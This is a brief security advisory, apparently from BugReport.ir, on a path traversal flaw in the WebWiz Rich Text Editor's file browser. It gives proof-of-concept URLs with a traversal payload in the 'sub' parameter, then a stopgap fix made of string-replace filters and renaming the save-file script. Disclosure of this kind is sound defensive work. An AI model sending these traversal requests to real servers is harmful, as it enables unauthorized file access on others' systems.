########################## WwW.BugReport.ir
###########################################
###################################################################################
####################
####################
-POC:
http://[WebWiz
RTE]/RTE_file_browser.asp?look=save&sub=\…\\\…\\\…\\\…\\\…\\\
http://[WebWiz RTE]/RTE_popup_save_file.asp
####################
Fast Solution :
####################
1- You can see below lines in "RTE_file_browser.asp"
'Stip path tampering for security reasons
strSubFolderName = Replace(strSubFolderName, "../", "", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, "..\", "", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, "./", "", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, ".\", "", 1, -1, 1)
Only add this to them:
strSubFolderName = Replace(strSubFolderName, "/", "\", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, "\\", "\", 1, -1, 1)
strSubFolderName = Replace(strSubFolderName, "…", "", 1, -1, 1)
2- Rename "RTE_popup_save_file.asp" till main solution by vendor
####################